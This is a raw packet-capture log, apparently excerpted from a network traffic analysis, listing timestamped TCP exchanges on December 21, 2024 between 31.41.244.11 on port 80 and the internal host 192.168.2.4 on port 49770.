                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.941845894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.941896915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.941977024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.942025900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.942903042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.942954063 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.943032980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.943082094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.943840027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.943887949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.943972111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.944020033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.944971085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.945023060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.945101023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.945147991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.946093082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.946141958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.946219921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.946269989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.946881056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.946939945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.947036982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.947086096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.947844028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.947894096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.947973013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.948024988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.948947906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.948996067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.949074984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.949124098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.949856997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.949908018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.950123072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.950171947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.950907946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.950957060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.951181889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.951231003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.951844931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.951891899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.952135086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.952177048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.952934027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.952982903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.953062057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.953105927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.953975916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.954025030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.954103947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.954158068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.954904079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.954953909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.955022097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.955069065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.955847025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.955904007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.955971956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.956020117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.956777096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.956825972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.956899881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.956948996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.957812071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.957860947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.958900928 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.958936930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.958956003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.958983898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.959230900 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.959284067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.959904909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.959954023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.960031986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.960081100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.960844040 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.960892916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.960971117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.961019039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.961802959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.961853981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.961993933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.962049007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.962790012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.962838888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.963074923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.963124037 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.963804007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.963840008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.963855028 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.963886023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.964195013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.964245081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.964323997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.964374065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.965274096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.965372086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.965374947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.965431929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.966550112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.966599941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.966680050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.966731071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.967267990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.967327118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.967493057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.967542887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.968209028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.968255997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.968337059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.968388081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.969263077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.969319105 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.969397068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.969453096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.970221996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.970277071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.970385075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.970434904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.971296072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.971352100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.971472979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.971525908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.972199917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.972261906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.972354889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.972408056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.973251104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.973314047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.973378897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.973436117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.974229097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.974288940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.974354029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.974406958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.975356102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.975461960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.975513935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.975564003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.976186991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.976346970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.130563974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.130649090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.130819082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.130878925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.131108999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.131156921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.131241083 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.131287098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.132086039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.132136106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.132200003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.132293940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.133013964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.133060932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.133138895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.133182049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.134030104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.134082079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.134159088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.134262085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.135070086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.135112047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.135169983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.135221004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.136199951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.136256933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.136315107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.136374950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.137025118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.137077093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.137197971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.137248039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.138021946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.138076067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.138139963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.138186932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.139062881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.139113903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.139192104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.139240980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.140145063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.140196085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.140362024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.140414953 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.141026020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.141077042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.141184092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.141232014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.142040014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.142090082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.142167091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.142215014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.143065929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.143126011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.143189907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.143237114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.144063950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.144117117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.144181013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.144275904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.145055056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.145106077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.145169973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.145219088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.146034002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.146084070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.146249056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.146300077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.147046089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.147097111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.147173882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.147226095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.148116112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.148165941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.148279905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.148329973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.149076939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.149118900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.149180889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.149230957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.150063992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.150157928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.150161982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.150217056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.151050091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.151103020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.151199102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.151248932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.152040005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.152091026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.152211905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.152261972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.153074980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.153124094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.153239965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.153287888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.154062986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.154117107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.154196024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.154289007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.155071020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.155122995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.155185938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.155230999 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.156070948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.156136036 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.156191111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.156239986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.157072067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.157123089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.157200098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.157247066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.158132076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.158185005 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.158272028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.158319950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.159050941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.159096956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.159176111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.159224987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.160079002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.160134077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.160211086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.160260916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.161051035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.161103010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.161169052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.161226034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.162035942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.162086010 CET4977080192.168.2.431.41.244.11
